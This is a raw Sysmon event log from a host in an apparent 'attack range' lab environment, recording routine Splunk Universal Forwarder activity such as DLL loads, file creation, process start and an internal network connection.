10341000x8000000000000000100232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}63445016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 
23542300x8000000000000000100229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.857{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=275545B1A7A14467C5D22A377577532F,SHA256=D90FC783CC7233704B6020E089FAC2DE5C4781C1E185F419DCF9FBB1E0C6883F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 
734700x8000000000000000100219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 
Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 
734700x8000000000000000100209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 
734700x8000000000000000100202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe 
OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.045{326FD73D-C12D-6294-420B-000000005502}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:50.810{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F384CECFFFD0109ADEEEA79469EA79C5,SHA256=8AD2C35B957B6BF440B225FD61C511B0BEC98E76D071154081DD72B7E706A0B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x8000000000000000100235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.065{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53349-false10.0.1.12-8000- 23542300x8000000000000000100234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:50.185{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D81F9BA5639D8103223609E924FB10C,SHA256=73F26A7B7039BFD059F8874D22B17A1D6568B913BF627A09A7C277584878CA18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 
